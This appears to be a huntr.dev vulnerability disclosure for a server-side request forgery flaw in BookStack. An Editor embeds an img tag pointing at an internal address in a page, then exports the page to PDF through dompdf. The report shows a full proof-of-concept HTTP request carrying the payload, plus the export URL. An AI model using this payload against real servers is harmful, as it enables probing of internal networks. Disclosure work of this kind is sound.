Server-Side Request Forgery (SSRF) in bookstackapp/bookstack

2021-08-1313:06:38

d3adog

www.huntr.dev

server-side request forgery

bookstackapp

editor rights

malicious payload

dompdf

internal perimeter

EPSS

0.001

Percentile

21.4%

JSON

✍️ Description

User with “Editor” rights can create a special book page containing <img> tag with “src” property pointing to any external or internal resource. Exporting this page using default domPdf will result in firing request from server side.

🕵️‍♂️ Proof of Concept

Updating page with malicious payload in html parameter

POST /books/&lt;BOOK&gt;/page/&lt;PAGE&gt; HTTP/1.1
Host: &lt;HOST&gt;
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:91.0) Gecko/20100101 Firefox/91.0
Content-Type: application/x-www-form-urlencoded
Cookie: &lt;COOKIE&gt;

_token=&lt;CSRF-TOKEN&gt;&_method=PUT&summary=&name=123&html=<img src="http://127.0.0.1:7654/test.jpg">&tags%5B0%5D%5Bname%5D=&tags%5B0%5D%5Bvalue%5D=&tags%5Brandrowid%5D%5Bname%5D=&tags%5Brandrowid%5D%5Bvalue%5D=&attachment_link_uploaded_to=1&attachment_link_name=&attachment_link_url=&template=false

Exporting page to pdf

http://&lt;HOST&gt;/books/&lt;BOOK&gt;/page/&lt;PAGE&gt;/export/pdf

💥 Impact

An attacker can use this vulnerability to exploit other resources in internal perimeter

EPSS

0.001

Percentile

21.4%

JSON

Related for A8D7FB24-9A69-42F3-990A-2DB93B53F76B